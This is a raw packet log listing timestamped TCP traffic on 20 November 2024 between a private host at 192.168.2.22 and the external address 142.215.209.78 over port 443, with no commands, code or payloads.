Nov 20, 2024 07:50:17.354077101 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.354321003 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.354378939 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.354386091 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.354517937 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.354578018 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.354585886 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.354768038 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.354825974 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.354834080 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.354994059 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.355052948 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.355060101 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.355139017 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.355205059 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.355211973 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.355355978 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.355410099 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.355417013 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.355473995 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.355526924 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.355535030 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.355627060 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.355694056 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.355701923 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.355770111 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.355819941 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.355827093 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.355911970 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.355967999 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.355976105 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.366493940 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.440721035 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.440809965 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.440900087 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.440918922 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.440932989 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.440973043 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.441029072 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.441035986 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.441054106 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.441112041 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.441118956 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.441171885 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.441237926 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.441246033 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.441385031 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.441437960 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.441445112 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.441462040 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.441519022 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.441526890 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.441652060 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.441709042 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.441715956 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.441812992 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.441874027 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.441881895 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.442138910 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.442203045 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.442209959 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.442219973 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.442277908 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.442285061 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.442301035 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.442352057 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.442361116 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.442502975 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.442558050 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.442565918 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.442656994 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.442742109 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.442759991 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.442766905 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.442795038 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.442814112 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.442873955 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.442883015 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.460592031 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.528676987 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.528774023 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.528791904 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.528877020 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.528944969 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.528956890 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.529151917 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.529236078 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.529243946 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.529371023 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.529433012 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.529442072 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.529567003 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.529627085 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.529637098 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.529772043 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.529838085 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.529846907 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.529973030 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.530035019 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.530044079 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.530278921 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.530343056 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.530350924 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.530509949 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.530586958 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.530595064 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.530628920 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.530699968 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.530709028 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.530757904 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.530826092 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.530834913 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.530942917 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.531012058 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.531022072 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.531061888 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.531122923 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.531131983 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.531205893 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.531260014 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.531269073 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.531359911 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.531415939 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.531424999 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.531498909 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.531574965 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.531584024 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.535237074 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.616326094 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.616400003 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.616410971 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.616489887 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.616563082 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.616570950 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.616805077 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.616857052 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.616869926 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.617063046 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.617119074 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.617125988 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.617290974 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.617347002 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.617357016 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.617661953 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.617731094 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.617738962 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.617851973 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.617903948 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.617911100 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.617934942 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.617988110 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.617995977 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.618139029 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.618191004 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.618199110 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.618329048 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.618386984 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.618395090 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.618520975 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.618577957 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.618586063 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.618655920 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.618711948 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.618721962 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.618860006 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.618923903 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.618931055 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.618963003 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.619018078 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.619025946 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.619102955 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.619162083 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.619168997 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.626943111 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.705797911 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.705879927 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.705895901 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.705951929 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.706013918 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.706022024 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.706069946 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.706139088 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.706147909 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.706343889 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.706406116 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.706413031 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.706471920 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.706533909 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.706542969 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.706605911 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.706669092 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.706676960 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.706919909 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.707195997 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.707273960 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.707281113 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.707447052 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.707499027 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.707506895 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.707602978 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.707618952 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.707624912 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.707681894 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.707720995 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.707777023 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.707783937 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.707853079 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.707914114 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.707922935 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.707995892 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.708172083 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.708229065 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.708235979 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.708353996 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.708673954 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.708741903 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.708749056 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.708813906 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.708872080 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.708879948 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.709599018 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.709667921 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.709676027 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.709743023 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.709805012 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.709813118 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.710124969 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.793605089 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.793670893 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.793690920 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.793787956 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.793838978 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.793847084 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.794173956 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.794250011 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.794258118 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.794275999 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.794329882 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.794337988 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.794356108 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.794404030 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.794413090 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.794434071 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.794444084 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.794482946 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.794490099 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.794500113 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.794579029 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.794616938 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.794670105 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.794677019 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.794687986 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.794701099 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.794739962 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.794748068 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.794769049 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.794787884 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.794923067 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.795011997 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.795017958 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.795157909 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.795209885 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.795217991 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.795341969 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.795403957 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.795412064 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.795686007 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.795746088 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.795753002 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.795823097 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.795871019 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.795877934 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.795917034 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.795963049 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.795969963 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.796431065 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.796487093 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.796494007 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.796703100 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.796758890 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.796766996 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.881117105 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.881175041 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.881195068 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.881206036 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.881282091 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.881335020 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.881341934 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.881630898 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.881722927 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.881731033 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.881784916 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.881828070 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.881836891 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.881848097 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.882014990 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.882072926 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.882082939 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.882184029 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.882241964 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.882250071 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.882350922 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.882433891 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.882442951 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.882594109 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.882652044 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.882659912 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.882810116 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.882868052 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.882875919 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.883101940 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.883142948 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.883151054 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.883163929 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.883352041 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.883404970 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.883414030 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.883584023 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.883640051 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.883649111 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.883781910 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.883841038 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.883847952 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.883959055 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.884011030 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.884021997 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.884200096 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.884263992 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.884273052 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.884443045 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.884502888 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.884511948 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.968975067 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.969098091 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.969111919 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.969254017 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.969300032 CET	49166	443	192.168.2.22	142.215.209.78
Nov 20, 2024 07:50:17.969307899 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.969521999 CET	443	49166	142.215.209.78	192.168.2.22
Nov 20, 2024 07:50:17.969582081 CET	49166	443	192.168.2.22	142.215.209.78
